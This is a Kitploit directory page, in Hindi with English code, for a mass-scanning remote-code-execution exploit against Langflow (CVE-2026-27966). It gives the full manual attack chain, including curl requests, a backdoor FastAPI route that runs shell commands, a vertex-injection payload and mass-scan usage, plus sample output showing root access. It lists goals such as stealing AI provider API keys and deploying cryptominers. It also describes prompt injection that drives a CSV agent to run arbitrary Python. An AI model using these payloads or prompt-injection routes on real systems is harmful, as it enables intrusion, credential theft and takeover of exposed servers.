Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-27966 — Pre-auth RCE स्कैनर Langflow < 1.8.0 के लिए — Route Injection + Vertex Injection → Code Execution (CVSS 9.8) | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-27966
टोहीभेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलAI सुरक्षा
GitHubshinthink/cve-2026-27966

CVE-2026-27966

Pre-auth RCE स्कैनर Langflow < 1.8.0 के लिए — Route Injection + Vertex Injection → Code Execution (CVSS 9.8)

रिपॉजिटरी देखें
232 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-27966 — Langflow रिमोट कोड निष्पादन स्कैनर

प्री-ऑथ रूट इंजेक्शन + वर्टेक्स इंजेक्शन → पायथन कोड निष्पादन


अवलोकन

CVE-2026-27966, Langflow के 1.8.0 से पहले के संस्करणों में एक क्रिटिकल-गंभीरता (CVSS 9.8) प्री-प्रमाणीकरण रिमोट कोड निष्पादन भेद्यता है। यह भेद्यता CSV एजेंट घटक में allow_dangerous_code=True के हार्डकोड किए जाने के कारण उत्पन्न होती है, जो LangChain के python_repl_ast टूल को बिना प्रमाणीकरण के प्रॉम्प्ट इंजेक्शन के लिए उजागर करती है।

इसके अतिरिक्त, कई API एंडपॉइंट्स में उचित प्रमाणीकरण का अभाव है, जिससे सीधे रूट इंजेक्शन और फ्लो वर्टेक्स इंजेक्शन संभव हो जाते हैं — यहां तक कि उन इंस्टेंस पर भी जहां CSV एजेंट कॉन्फ़िगर नहीं है।

प्रभावित संस्करण

Langflow संस्करणस्थिति
< 1.8.0सुभेद्य
>= 1.8.0पैच किया गया

हमले के वेक्टर

यह स्कैनर तीन अलग-अलग शोषण पथों का परीक्षण करता है:

1. रूट इंजेक्शन (auto_login बायपास)

root@kitploit:~
GET  /api/v1/auto_login          → obtain session / API key
POST /api/v1/custom_component    → register backdoor route
GET  /api/{backdoor}?c=command   → RCE

2. डायरेक्ट रूट इंजेक्शन (बिना API कुंजी)

root@kitploit:~
POST /api/v1/custom_component    → register backdoor route
GET  /api/{backdoor}?c=command   → RCE

3. बिल्ड वर्टेक्स इंजेक्शन (बिना प्रमाणीकरण बिल्ड)

root@kitploit:~
GET  /api/v1/flows/basic_examples  → extract flow UUIDs (26 exposed)
POST /api/v1/build/{UUID}/vertices → inject malicious vertex
POST /api/v1/run/{UUID}            → execute vertex code → RCE

भेद्यता तंत्र

मूल कारण

src/lfx/src/lfx/components/langchain_utilities/csv_agent.py में, CSV एजेंट नोड allow_dangerous_code=True हार्डकोड करता है, जो स्वचालित रूप से LangChain के python_repl_ast टूल को उजागर करता है:

root@kitploit:~
agent_kwargs = {
    "verbose": self.verbose,
    "allow_dangerous_code": True,  # hardcoded — cannot be disabled via UI
}
agent_csv = create_csv_agent(..., **agent_kwargs)

यह CSV एजेंट तक पहुंचने वाले किसी भी प्रॉम्प्ट को निम्न के माध्यम से मनमाना पायथन कोड निष्पादित करने की अनुमति देता है:

root@kitploit:~
Action: python_repl_ast
Action Input: __import__("os").system("command")

बिना प्रमाणीकरण वाली API सतह

Langflow REST API कई एंडपॉइंट्स को बिना प्रमाणीकरण के उजागर करता है:

auto_login के माध्यम से प्रमाणीकरण बायपास

जिन इंस्टेंस पर auto_login सक्षम है (कई Docker तैनातियों में डिफ़ॉल्ट), एक हमलावर वैध सत्र और API कुंजी प्राप्त करता है:

root@kitploit:~
curl -sk 'https://target.com/api/v1/auto_login'
# Returns session with access_token → full API access

वैध API कुंजी के साथ, हमलावर सर्वर पुनरारंभ होने तक मेमोरी में बने रहने वाले बैकडोर FastAPI रूट को पंजीकृत करने के लिए POST /api/v1/custom_component का उपयोग कर सकता है:

root@kitploit:~
from fastapi import APIRouter, Query
router = APIRouter()
@router.get("/sh")
async def cmd(c: str = Query("")):
    import os
    return os.popen(c).read()
app.include_router(router, prefix="/api")

CVSS 9.8 क्यों


इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-27966.git
cd CVE-2026-27966
pip install -r requirements.txt

उपयोग

root@kitploit:~
# Single target
python cve_2026_27966.py -t target.com:7860

# Mass scan
python cve_2026_27966.py -f targets.txt

# Mass scan + save results
python cve_2026_27966.py -f targets.txt -o rce.txt

# Detect only (skip exploitation)
python cve_2026_27966.py -f targets.txt --no-exploit

# Verbose output
python cve_2026_27966.py -f targets.txt -v

तर्क

root@kitploit:~
  -t, --target      Single target (IP:port or domain)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 30)
  --no-exploit      Detection only, skip RCE attempts
  -v, --verbose     Show all results including non-RCE targets

प्रूफ ऑफ कॉन्सेप्ट

पहचान और शोषण

root@kitploit:~
$ python cve_2026_27966.py -t target.com:7860 -v
root@kitploit:~
  CVE-2026-27966 — Langflow RCE Scanner
  CVSS 9.8 | Pre-Auth | Route Injection → RCE

  Host     : target.com:7860
  Langflow : YES v1.2.0
  Vuln     : YES
  API Key  : NOT REQUIRED
  RCE      : YES
  Output   : uid=0(root) gid=0(root) groups=0(root)
  Time     : 12.3s

मास स्कैन आउटपुट

root@kitploit:~
  CVE-2026-27966 Langflow RCE Scanner
  Targets: 4127 | Threads: 30 | Exploit: ON
  -------------------------------------------------------

  [RCE]  192.168.10.50     v1.2.0    7.3s
         uid=0(root) gid=0(root) groups=0(root)
  [AUTH] target.internal:4433 v1.2.0   14.1s  (API key)
  [500/4127] scanning... (12%)

  -------------------------------------------------------
  Total: 4127 | Langflow: 47 | RCE: 3 | API-Protected: 41
  -------------------------------------------------------

मैनुअल शोषण

चरण 1 — Langflow का पता लगाएं

root@kitploit:~
curl -sk 'https://target.com/api/v1/version'
# {"version":"1.2.0","main_version":"1.2.0","package":"Langflow"}

चरण 2 — फ्लो UUID निकालें

root@kitploit:~
curl -sk 'https://target.com/api/v1/flows/basic_examples/' | jq '.[0].id'
# "bb0a7390-22a1-4a2e-8d7c-15463e53d9f2"

चरण 3 — बैकडोर वर्टेक्स इंजेक्ट करें

root@kitploit:~
curl -sk -X POST 'https://target.com/api/v1/build/{UUID}/vertices' \
  -H 'Content-Type: application/json' \
  -d '{"id":"bkdr","type":"CustomComponent","data":{"code":"from fastapi import APIRouter\nrouter=APIRouter()\[email protected](\"/sh\")\nasync def cmd(c:str=\"\"):import os;return os.popen(c).read()\napp.include_router(router,prefix=\"/api\")","display_name":"X"}}'

चरण 4 — कमांड निष्पादित करें

root@kitploit:~
curl -sk 'https://target.com/api/sh?c=id;hostname;uname -a'

प्रभाव

सफल शोषण Langflow Docker कंटेनर में रूट के रूप में रिमोट कोड निष्पादन प्राप्त कराता है। वहां से एक हमलावर निम्न कार्य कर सकता है:

  • Langflow की SQLite डेटाबेस से API कुंजियाँ निकालना (OpenAI, Anthropic, Gemini, आदि)
  • कनेक्टेड वेक्टर डेटाबेस और बाहरी सेवाओं तक पहुंचना
  • कस्टम घटकों के माध्यम से स्थायी बैकडोर तैनात करना
  • आंतरिक नेटवर्क में पिवट करना
  • क्रिप्टोमाइनर या C2 इंफ्रास्ट्रक्चर तैनात करना

अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए।

यह सॉफ्टवेयर अधिकृत पेनेट्रेशन परीक्षण करने वाले सुरक्षा पेशेवरों, अपने स्वयं के इंफ्रास्ट्रक्चर का ऑडिट करने वाले संगठनों और भेद्यता शोषण का अध्ययन करने वाले शोधकर्ताओं के लिए है।

कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है और निम्न का उल्लंघन हो सकता है:

  • संयुक्त राज्य अमेरिका: कंप्यूटर फ्रॉड एंड एब्यूज़ अधिनियम (18 U.S.C. 1030)
  • इंडोनेशिया: UU ITE धारा 30 और 46
  • यूरोपीय संघ: निर्देश 2013/40/EU
  • यूनाइटेड किंगडम: कंप्यूटर मिसयूज़ अधिनियम 1990

लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं। इस सॉफ्टवेयर का उपयोग करके, आप अपने कार्यों की पूरी जिम्मेदारी स्वीकार करते हैं।


संदर्भ

संसाधनलिंक

यह प्रोजेक्ट Langflow या Logspace से संबद्ध नहीं है।

टूल डाउनलोड करें
एंडपॉइंटप्रमाणीकरणउजागर डेटा
GET /api/v1/versionकोई नहींLangflow संस्करण
GET /api/v1/healthकोई नहींइंस्टेंस स्थिति
GET /api/v1/flows/basic_examples/कोई नहीं26 उदाहरण फ्लो UUID + संरचना
POST /api/v1/build/{uuid}/verticesकोई नहींमनमाना कोड इंजेक्शन स्वीकार करता है
POST /api/v1/users/कोई नहींउपयोगकर्ता निर्माण (निष्क्रिय)
GET /openapi.jsonकोई नहींपूर्ण API दस्तावेज़
मीट्रिकमान
आक्रमण वेक्टरनेटवर्क (रिमोट)
आक्रमण जटिलताकम
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
दायराअपरिवर्तित
गोपनीयताउच्च
अखंडताउच्च
उपलब्धताउच्च
GitHub सुरक्षा सलाहGHSA-3645-fxcv-hqr4
फिक्स कमिटd8c6480d
Metasploit मॉड्यूलRapid7
NVD प्रविष्टिCVE-2026-27966